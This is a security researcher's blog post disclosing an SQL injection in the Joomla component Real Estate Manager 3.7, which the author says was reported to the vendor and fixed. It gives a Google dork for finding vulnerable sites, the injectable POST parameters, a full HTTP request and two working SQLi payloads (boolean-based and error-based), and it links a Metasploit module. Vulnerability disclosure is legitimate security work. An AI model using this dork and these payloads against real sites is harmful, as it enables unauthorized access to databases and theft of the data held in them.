October 13, 2016 Omer Ramić Pentesting
0Day exploit for Joomla component Real Estate Manager - version 3.7

This vulnerability is found in Joomla CMS component Real Estate Manager, version 3.7. Type of the vulnerability is SQLi (SQL injection). I found it on October 10th, 2015. I have submitted the find to the vendors of the component, they have fixed it in next version.

Exploit module for Metasploit can be found here: https://www.rapid7.com/db/modules/auxiliary/gather/joomla_com_realestatemanager_sqli

REMARK: This vulnerability is found and tested on loacalhost.

#Component description on vendor page:

Real Estate Manager is handy joomla rental component and powerful solution for build real estate website creation and property management. It will fit perfectly for independent estate realtor, property rental companies and agencies, motel booking, hotel room booking, property rental, real estate selling and realty management.

 

#Dodatni podaci o komponenti:

# Title of the vulnerability/exploit: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Author of the vulnerability/exploit: [Omer Ramić]
# Vendor website: [http://ordasoft.com/]
# Link to software: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all the older versions
# Platform it was tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
 
#Multiple vulnerable parameters (POC is given only for the first parameter):
Parameter_1: order_direction (POST)
Parameter_2: order_field (POST)
 
#Vulnerable parameters 1 & 2 are in this POST request:
POST /index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0; 9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

order_direction=asc&order_field=price
 
#Vectors:
POC_1:
order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&order_field=price
 
POC_2:
order_direction=asc,(SELECT 1841 FROM(SELECTCOUNT(*),CONCAT(0x716b787671,(SELECT(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price